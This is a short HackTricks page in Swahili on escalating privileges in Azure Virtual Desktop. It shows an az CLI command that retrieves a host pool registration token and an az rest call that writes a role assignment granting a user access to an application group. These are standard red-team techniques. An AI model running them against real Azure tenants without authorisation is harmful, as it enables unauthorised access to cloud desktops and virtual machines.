Az - Virtual Desktop Privesx

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Azure Virtual Desktop Privesc

Kwa maelezo zaidi kuhusu Azure Virtual Desktop angalia:

Az - Virtual Desktop

Microsoft.DesktopVirtualization/hostPools/retrieveRegistrationToken/action

Unaweza kupata token ya usajili inayotumika kujiandikisha kwa mashine za virtual ndani ya host pool.

az desktopvirtualization hostpool retrieve-registration-token -n testhostpool -g Resource_Group_1

Microsoft.Authorization/roleAssignments/read, Microsoft.Authorization/roleAssignments/write

Warning

Mshambuliaji mwenye ruhusa hizi anaweza kufanya mambo hatari zaidi kuliko haya.

Kwa ruhusa hizi unaweza kuongeza mgawo wa mtumiaji kwenye kundi la Programu, ambalo linahitajika ili kufikia mashine ya virtual ya desktop ya virtual:

az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP_NAME>/providers/Microsoft.DesktopVirtualization/applicationGroups/<APP_GROUP_NAME>/providers/Microsoft.Authorization/roleAssignments/<NEW_ROLE_ASSIGNMENT_GUID>?api-version=2022-04-01" \
--body '{
"properties": {
"roleDefinitionId": "/subscriptions/<SUBSCRIPTION_ID>/providers/Microsoft.Authorization/roleDefinitions/1d18fff3-a72a-46b5-b4a9-0b38a3cd7e63",
"principalId": "<USER_OBJECT_ID>"
}
}'

Kumbuka kwamba ili mtumiaji aweze kufikia Desktop au programu, pia anahitaji jukumu la Virtual Machine User Login au Virtual Machine Administrator Login juu ya VM.

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks